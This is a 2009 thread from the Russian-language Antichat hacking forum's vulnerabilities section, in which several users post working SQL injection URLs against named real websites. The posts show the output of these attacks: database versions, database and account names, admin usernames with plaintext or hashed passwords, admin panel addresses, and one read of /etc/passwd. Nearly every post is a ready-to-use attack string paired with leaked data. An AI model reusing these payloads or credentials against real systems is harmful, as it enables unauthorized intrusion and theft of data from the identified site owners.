ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8591  
Старый 27.03.2009, 17:58
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.swstechnology.com/equipment_product.php?ID=-1'+union+select+1,concat_ws(0x3a,ID,Username,Passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0+from+adminuser+--+

1:admin:24906u5j
 
Ответить с цитированием

  #8592  
Старый 27.03.2009, 18:09
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.adonay.bg/ru/galery_pop.php?id=-37+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6

Database Version: 5.0.67-community
Database name: adonayb_Adiabat
User name: adonayb_site@localhost



http://www.cartel-sa.com/en/news_details.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8


Database Version: 5.0.67-community
Database name: cartelsa_cartel
User name: cartelsa_site@localhost


http://www.dmsbg.com/projects_details_actual.php?id=-89+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10,11&start=0



Database Version: 4.0.27-log
Database name: DMS
User name: dmsbg@localhost



http://www.atlanticgamma.com/en/presentation.php?id=-12+union+select+1,,3,4,5,6,7,8


Database Version: 5.0.67-community
Database name: atlantic_Atlantic
User name: atlantic_site@localhost



http://www.pixel.bg/portfolio_details.php?dejnost=4&id=-27+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18


Database Version: 5.0.67-community
Database name: pixelb_Pixel
User name: pixelb_site@localhost


http://www.atriumbulgarianrealestate.com/property_details.php?id=-492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,ver sion(),database(),useR()),60,61

Database Version: 5.0.67-community
Database name: atriumbu_Atrium
User name: atriumbu_site@localhost



http://www.restaurant.bg/designs/inox2_en.php?id=-4192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,concat_ws(0x3a,version(),database(),useR()),67 ,68,69,70


Database Version: 5.0.67-community
Database name: restaura_restaurant
User name: restaura_site@localhost


http://www.bar.bg/designs/inox2_en.php?id=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,concat_ws(0x3a,version(),database(),useR()),67, 68,69,70


Database Version: 5.0.67-community
Database name: barbg_bar
User name: barbg_site@localhost



http://www.real-estates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,versi on(),database(),useR()),60



Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost



http://www.bulgarianrealestates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,versi on(),database(),useR()),60


Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost



http://www.maxbg.bg/en/property_details.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7


Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost




ну и сайт компании которая создала все эти сайты

http://www.lemon.bg/news_details.php?id=28+and+substring((select+y=1..3() ),1,1)>x

y1=version
y2=database
y3=user

x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105,1 16,121
x2=108,101,109,111,110,98,103,95,76,101,109,111,110
x3=108,101,109,111,110,98,103,95,115,105,116,101,64, 108,111,99,97,108,104,111,115,116


Version :5.0.67-community
Database : lemonbg_Lemon
User : lemonbg_site@localhost

Последний раз редактировалось Gorev; 27.03.2009 в 18:40..
 
Ответить с цитированием

  #8593  
Старый 27.03.2009, 18:42
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Код:
http://www.yogaold.com/index.php?ID=16&m=1&id=-133'+union+select+concat_ws(0x3a,version(),database(),user()),2/*
 
Ответить с цитированием

  #8594  
Старый 27.03.2009, 19:41
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.unity-online.ru/prod.php?ctov=pleers&where=model&all=4U&idm=-1+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14+from+information_schema.tables+limit+1,1/*
 
Ответить с цитированием

  #8595  
Старый 27.03.2009, 20:23
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

site: cultpohod.ru

Код:
http://www.cultpohod.ru/blockdetal.php?id=-267+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

4.0.25::wwwcultpohodru::cultpoho@bux.hc.ru
 
Ответить с цитированием

  #8596  
Старый 27.03.2009, 20:30
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.ghp.kodar.net/index.php?id=-66+union+select+1,2,3,concat_ws(0x3a,id,name,passw ord),5,6,7+from+users/*
 
Ответить с цитированием

  #8597  
Старый 27.03.2009, 22:25
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.phos.be/newsletter/index.php?id=00062+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5+limit+1,1
version():5.0.67-log
database():phos_phos
user():phos_w@209.68.4.63
 
Ответить с цитированием

  #8598  
Старый 28.03.2009, 00:55
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

Код:
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*&view=Monkeys
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+admins/*&view=Monkeys
administrator:648233e399d5b7f1dfe2f058fd24b391:mandoua
Админка:
Код:
http://waza.org/admin/
user(): wazaorg_wazaweb@localhost
database(): wazaorg_Network
version(): 4.1.25
PR: 7
---------------------------------------------------
Код:
http://www.eyemagazine.com/issue.php?id=18+and+substring((select+version()+from+information_schema.tables+limit+0,1),1,1)=5/*
user(): haymarket@localhost
database(): haymarket
version(): 5.0.22-Debian_0ubuntu6.06.11-log
PR: 6
---------------------------------------------------
Код:
http://www.all-media.info/page.php?id=19'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7+limit+1,1/*
http://www.all-media.info/page.php?id=19'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7+limit+1,1/*
user(): all-media@localhost
database(): allmedia
version(): 4.1.18-standard
PR: 5
 
Ответить с цитированием

  #8599  
Старый 28.03.2009, 02:09
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.chateaudeseneffe.be/aVenirDetail.php?id=236+union+select+1,2,3,4,5,concat(version(),0x3a,database(),0x3a,user()),7,8,9,10,11/*
version():5.0.22-community-max-nt
database():chateaudeseneffe
user():seneffe@cp287.mysite4now.com

Последний раз редактировалось jokester; 28.03.2009 в 10:21.. Причина: educationsante.be БОЯН
 
Ответить с цитированием

  #8600  
Старый 28.03.2009, 07:46
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.positionsmart.co.za/admin/view_request.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ